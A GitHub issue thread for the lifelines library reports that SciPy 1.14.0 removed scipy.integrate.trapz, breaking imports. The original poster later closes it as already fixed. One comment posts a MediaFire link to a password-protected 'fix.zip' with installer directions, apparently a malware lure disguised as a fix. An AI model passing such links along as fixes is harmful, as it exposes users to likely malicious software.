### ISSUE TITLE
scipy.integrate.trapz is deprecated from SciPy 1.14.0

### ISSUE THREAD

**Issue by skjongithub** [CamDavidsonPilon/lifelines#1632]
Thank you very much for creating and maintaining such a useful package.
I'd like to report an issue reguarding to the title.

With SciPy >= 1.14.0, the lifelines(0.29.0)/fitters package will cause:
`cannot import name 'trapz' from 'scipy.integrate'`

In SciPy 1.14.0 Releast Note ( https://docs.scipy.org/doc/scipy/release/1.14.0-notes.html#expired-deprecations )
In expired deprecation section:
`scipy.integrate.{simps,trapz,cumtrapz}` have been removed in favour of `simpson`, `trapezoid`, and `cumulative_trapezoid`.

Maybe it's only needed that changing the import name?

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by skjongithub** [comment]
Oh I noticed that this issue is solved in 0.29.0. Sorry, I'll close this issue.
